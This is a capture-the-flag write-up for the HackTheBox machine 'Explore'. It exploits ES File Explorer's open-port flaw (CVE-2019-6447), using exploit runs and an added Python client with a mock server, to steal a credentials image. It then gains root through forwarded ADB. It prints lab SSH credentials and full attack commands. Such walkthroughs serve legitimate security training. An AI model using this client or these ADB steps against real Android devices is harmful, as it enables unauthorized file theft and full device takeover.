Explore

This was, in my opinion, a very easy machine on HackTheBox. The foothold comes from exploiting a public vulnerability in ES File Explorer for which an exploit is readily available; it lets us pull a picture off the device that contains a set of valid SSH credentials. With that SSH session we can forward a port to the Android Debug Bridge (ADB), which is filtered from the outside and only reachable locally. Since adb ships with root and shell commands, that service alone is enough to get a shell as a high-privileged user.

Port Scan

Nmap scan report for 10.10.10.247
Host is up (0.037s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
43057/tcp open     unknown
59777/tcp open     unknown

Enumeration

Since we don’t know at this point what any of these ports are, let us run some service enumeration scripts using nmap:

$ nmap -sC -sV -p 2222,5555,42135,43057,59777 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.042s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
43057/tcp open     unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 18 Sep 2021 17:17:40 GMT
[...]
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).

Some googling shows that the Banana Studio SSH server is only available for Android, so we are most likely attacking an Android device. That also explains port 5555: TCP/5555 is the default port on which adbd listens when Android Debug Bridge (ADB) is enabled over TCP. Note that nmap reports it as filtered rather than closed, i.e. something drops our probes instead of refusing the connection.

Foothold

The most interesting service here is ES File Explorer, for which a public exploit (CVE-2019-6447) is available. The vulnerable part is an unauthenticated HTTP API that the app opens on TCP/59777; nmap's "Bukkit JSONAPI" guess for that port is a misidentification, and the exploit talks to 59777 rather than to the name-response port 42135.

The exploit can be downloaded and run without modification. It supports a handful of commands (for example listFiles, listPics and getFile) that we can try. listPics returns the pictures stored on the device, one of which is called creds.jpg. That sounds interesting.

$ python3 ./exploit.py listPics 10.10.10.247

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

We can use getFile to download and look at the picture.

$ python3 ./exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.
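The two steps above (listing pictures, then downloading one by path) are just two unauthenticated HTTP requests. The following Python client is an added example, not the PwnerSec exploit used here; it reproduces what that exploit does under the hood against a mock of the vulnerable service that is constructed inline (the entries and file bytes it serves are made up for offline use). The request shapes are those of CVE-2019-6447: a POST with a JSON body selecting the command, and a plain GET of an absolute device path to fetch a file.

```python
"""Minimal client for the ES File Explorer open-port API (CVE-2019-6447).

Added example, not the exploit used in the writeup. The app exposes an
unauthenticated HTTP service on TCP/59777: a JSON POST body selects a
command (listPics, listFiles, ...), and a GET of an absolute path downloads
that file. The mock server below is constructed for offline testing and
only imitates the two responses used here.
"""
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ES_PORT = 59777  # default port of the vulnerable HTTP service


def es_command(host, command, port=ES_PORT, timeout=5):
    """POST {"command": ...} to the root URL and return the decoded JSON list."""
    body = json.dumps({"command": command}).encode()
    req = urllib.request.Request(
        f"http://{host}:{port}/", data=body,
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode())


def es_fetch(host, path, port=ES_PORT, timeout=5):
    """GET an absolute device path (e.g. /storage/emulated/0/DCIM/creds.jpg)."""
    if not path.startswith("/"):
        raise ValueError("path must be absolute on the device")
    with urllib.request.urlopen(f"http://{host}:{port}{path}", timeout=timeout) as resp:
        return resp.read()


def find_entries(listing, needle):
    """Return the 'location' of every listing entry whose name contains needle."""
    return [e["location"] for e in listing if needle in e.get("name", "")]


# ---- constructed mock of the vulnerable service, for offline use only ----
MOCK_PICS = [
    {"name": "concept.jpg", "time": "4/21/21 02:38:08 AM",
     "location": "/storage/emulated/0/DCIM/concept.jpg", "size": "135.33 KB (138,573 Bytes)"},
    {"name": "creds.jpg", "time": "4/21/21 02:38:18 AM",
     "location": "/storage/emulated/0/DCIM/creds.jpg", "size": "1.14 MB (1,200,401 Bytes)"},
]
MOCK_FILES = {"/storage/emulated/0/DCIM/creds.jpg": b"\xff\xd8\xff\xe0FAKEJPEG"}


class _MockES(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_POST(self):
        body = json.loads(self.rfile.read(int(self.headers["Content-Length"])))
        data = MOCK_PICS if body.get("command") == "listPics" else []
        self._send(200, json.dumps(data).encode(), "application/json")

    def do_GET(self):
        blob = MOCK_FILES.get(self.path)
        if blob is None:
            self._send(404, b"not found", "text/plain")
        else:
            self._send(200, blob, "application/octet-stream")

    def _send(self, code, payload, ctype):
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)


def start_mock():
    """Start the mock on an ephemeral loopback port; returns (host, port)."""
    srv = HTTPServer(("127.0.0.1", 0), _MockES)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address


def demo():
    """Against the mock: list pictures, pick creds.jpg, download it."""
    host, port = start_mock()
    pics = es_command(host, "listPics", port=port)
    target = find_entries(pics, "creds")[0]
    return target, es_fetch(host, target, port=port)


if __name__ == "__main__":
    path, data = demo()
    print(f"{path}: {len(data)} bytes")
```

Against a real target you would call es_command("10.10.10.247", "listPics") and es_fetch with the returned location; the point of the example is that there is no authentication step anywhere in the exchange, so anyone who can reach TCP/59777 gets the same access the app's own UI has.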

out.dat is simply creds.jpg under another name, so let's look at it (the image itself is not reproduced here):

This does look very much like a username and password. Likely, a user uploaded the picture to remember their access credentials. The credentials kristi:Kr1sT!5h@Rp3xPl0r3! are in fact valid, and we can use them to log in via SSH on port 2222.

$ ssh kristi@10.10.10.247 -p 2222
Password authentication
Password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=[...]
:/ $

Note the uid: u0_a76 is an Android per-app UID, so the SSH server runs inside an ordinary app sandbox rather than as a regular Unix user. By the way, we can't get the user flag yet at this point. We actually need to fully root the machine in order to get access to its location (in the /data directory).

Privilege Escalation

To gain root, we go back to the start of our enumeration, where we found what we presumed to be Android Debug Bridge (ADB) on port 5555. That port showed as filtered: a firewall drops connections from the outside, so adbd over TCP can only be reached from the device itself or its local network, which we weren't on in the beginning. Now that we have SSH access, we can tunnel through it with local port forwarding.

$ ssh kristi@10.10.10.247 -p 2222 -L 5555:127.0.0.1:5555

We can now reach ADB on our own localhost. The adb documentation shows how this yields a root shell: connect to the device, select it by serial, then run adb root (which restarts adbd as root) followed by adb shell. Two caveats: adb root only succeeds on builds with ro.debuggable=1 (userdebug and eng builds); on a production build adbd refuses with "adbd cannot run as root in production builds". And the -s serial is needed because the adb server also probes localhost ports 5555-5585 for emulators, so our forwarded port additionally shows up as emulator-5554 in the device list below.

$ adb connect 127.0.0.1:5555
​* daemon not running; starting now at tcp:5037
​* daemon started successfully

$ adb devices
List of devices attached
127.0.0.1:5555  device
emulator-5554   device

$ adb -s 127.0.0.1:5555 root
restarting adbd as root
error: protocol fault (couldn't read status): Success

$ adb -s 127.0.0.1:5555 shell
x86_64:/ $ id
uid=0(root) gid=0(root) groups=0(root),[...]

The "protocol fault" after adb root is just the connection dropping while adbd restarts; if the device later shows as offline, run adb connect again. The shell that follows runs as uid 0, which gives us full administrative access to the target machine.